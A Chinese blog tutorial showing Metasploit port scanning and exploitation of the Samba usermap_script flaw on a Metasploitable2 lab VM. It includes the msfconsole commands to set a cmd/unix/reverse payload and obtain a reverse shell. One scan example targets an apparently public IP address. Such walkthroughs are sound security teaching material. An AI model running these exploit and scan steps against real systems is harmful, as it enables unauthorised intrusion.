渗透之metasploit技术-端口扫描,漏洞利用

一,使用主机模块进行端口扫描
启用metasploit msfconsole
渗透之metasploit技术-端口扫描,漏洞利用_第1张图片
检查有哪些可用端口。

search portscan

渗透之metasploit技术-端口扫描,漏洞利用_第2张图片
使用TCP扫描模块并检查有那些参数需要设置。

use [模板]
show options

渗透之metasploit技术-端口扫描,漏洞利用_第3张图片
设置待扫描的IP地址(RHOSTS),设置扫描的端口范围(PORTS),设置扫描的线程(THREADS),最后使用show options查看设置的参数。run,运行。

set RHOSTS [设置待扫描的IP地址]
set PORTS 1-500
set threads 20
show options

渗透之metasploit技术-端口扫描,漏洞利用_第4张图片
也可以使用unset取消某个参数。
这里取消的是ip地址,最后可看见开放了21端口。

unset rhosts
set rhosts 122.1.96.34
run

渗透之metasploit技术-端口扫描,漏洞利用_第5张图片
另外,还有两条命令,setg和unsetg。两者用于设置或者取消全局的参数值。
说明:metasploit也可以配合nmap使用。
重点:实战不要使用msf扫描,nmap是最佳选择。

渗透利用

此次模拟目标机是自我搭建的metasploitable2,攻击机为kali。

  • metasploitable2安装

    链接: https://pan.baidu.com/s/1X-Vala3EBZ_LnQ0r6b6yow 提取码: 1568

直接放入虚拟机种运行即可。
metasploitable2的默认账号密码都是msfadmin

在metasploitable2上查看ip。
渗透之metasploit技术-端口扫描,漏洞利用_第6张图片
kali上对目标ip进行扫描。

nmap -sV 192.168.102.134

渗透之metasploit技术-端口扫描,漏洞利用_第7张图片
从扫描结果中发现目标ip运行着Samba服务。

简介 Samba是一个能让Linux系统应用Microsoft网络通讯协议的软件,而SMB是Server Message Block的缩写,即为服务器消息块,SMB主要是作为Microsoft的网络通讯协议,后来Samba将SMB通信协议应用到了Linux系统上,就形成了现在的Samba软件。

在msf种搜索samba漏洞利用模块

search samba

渗透之metasploit技术-端口扫描,漏洞利用_第8张图片

发现漏洞利用模块exploit/multi/samba/usermap_script,rank是 excellent,是最好的,所以使用找个模块。

查看目标利用模块。

info exploit/multi/samba/usermap_script 

渗透之metasploit技术-端口扫描,漏洞利用_第9张图片
使用漏洞利用模块并且查看可用于攻击的payload

use exploit/multi/samba/usermap_script 
show payloads

渗透之metasploit技术-端口扫描,漏洞利用_第10张图片
这里我们使用cmd/unix/reverse

set payload cmd/unix/reverse

在这里插入图片描述

  • 设置攻击的目标机的ip
  • 设置漏洞利用的端口号
  • 设置攻击机的主机ip
    渗透之metasploit技术-端口扫描,漏洞利用_第11张图片
    运行。在攻击成功后,可以看到目标机和攻击机之间建立了一个shell连接。
    渗透之metasploit技术-端口扫描,漏洞利用_第12张图片

你可能感兴趣的:(linux,渗透,渗透测试)